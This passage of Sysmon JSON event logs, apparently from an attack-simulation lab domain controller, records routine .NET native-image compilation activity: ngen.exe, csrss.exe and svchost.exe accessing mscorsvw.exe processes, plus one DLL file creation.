C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.740","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-0010CEFE0F00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-0010CEFE0F00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-0010CEFE0F00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.756\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-0010CEFE0F00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.756","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-0010CEFE0F00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.928\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001079031000}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.928","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001079031000}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.928\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001079031000}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.928","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001079031000}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001079031000}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001079031000}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:50.084\r\nProcessGuid: {41C8662E-2298-5F25-0000-001079031000}\r\nProcessId: 3408\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d50-0\\System.ServiceModel.Web.dll\r\nCreationUtcTime: 2020-08-01 08:06:50.084","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:50.084","ProcessGuid":"{41C8662E-2298-5F25-0000-001079031000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d50-0\\System.ServiceModel.Web.dll","CreationUtcTime":"2020-08-01 08:06:50.084","EventReceivedTime":"2020-08-01 08:06:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:50.147\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001051980F00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:50.147","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001051980F00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:50.147\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001051980F00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:50.147","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001051980F00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
